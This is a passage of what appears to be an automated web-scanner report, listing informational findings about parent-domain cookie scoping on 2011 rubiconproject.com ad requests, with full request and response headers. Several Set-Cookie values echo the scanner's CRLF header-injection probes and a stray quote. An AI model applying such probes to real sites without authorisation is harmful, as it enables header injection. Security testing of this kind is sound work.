The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3212309.js^1^1315404852^1315404852&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2135

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3212309"
...[SNIP]...

8.21. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=25504210&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^4&12590^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^10&12590^103; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63812; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2289

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3191335"
...[SNIP]...

8.22. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=94406255&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^5&12590^2; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0"; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^6&12590^2568bf%250d%250ae6d071c9e42; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63764; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3165011.js^3^1315404895^1315405035&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:17:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1886

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3165011"
...[SNIP]...

8.23. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:24:35 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^19&12590^14; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63324; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.24. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb08ddb10f49af8be; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^40&12590^82; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63502; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2165

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3146392"
...[SNIP]...

8.25. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^113&12590^132; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188306.js^1^1315404888^1315404888&3151966.js^3^1315404887^1315404888&3152309.js^12^1315404884^1315404887&3220315.js^1^1315404885^1315404885&3165015.js^3^1315404883^1315404884&3178849.js^1^1315404882^1315404882&3151650.js^2^1315404881^1315404882&3196947.js^2^1315404881^1315404881&3226141.js^1^1315404881^1315404881&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2134

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188306"
...[SNIP]...

8.26. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-2.js?cb=56339010&keyword=ndm|news.local HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^10&12590^6; rdk=7856/12590; ses15=12338^7&12590^7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1c0952%250d%250adc97b2d5930; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^11&12590^454806; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63594; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...

8.27. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 